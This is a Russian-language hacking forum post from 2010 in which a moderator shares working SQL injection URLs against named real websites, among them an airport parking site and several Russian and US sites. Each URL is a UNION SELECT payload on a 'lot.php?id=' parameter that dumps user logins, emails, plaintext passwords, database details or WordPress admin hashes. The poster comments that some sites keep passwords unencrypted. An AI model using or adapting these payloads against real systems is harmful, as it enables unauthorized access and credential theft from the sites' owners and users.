Показать сообщение отдельно

  #10  
Старый 04.09.2010, 17:07
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами: 10139306

Репутация: 1089


По умолчанию

начнем

Код:
http://www.sale-info.ru/lot.php?id=-108+union+select+1,2,concat(user_login,char(58),user_pass),4,5,6,7,8,9,10,11,12+from+new_users+--+
Международный аэропорт лосанжелеса

пароли в открытом виде

Код:
http://www.airport-la.com/parking/lot.php?id=-7+union+select+1,2,3,concat(email,char(58),password),5,6,7,8,9,10,11,12,13,14+from+partners+--+
здесь пассы в БД не хранятся так что просто вывел

Код:
http://www.zagorodny-dom.ru/lot.php?id=-246+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10+--+
здесь тоже пароли в открытом виде

Код:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12+from+parking.users+--+
ну или так выводим админский акк и хеш

Код:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12+from+wordpress3.wp_02n0c4_users+--+
 
Ответить с цитированием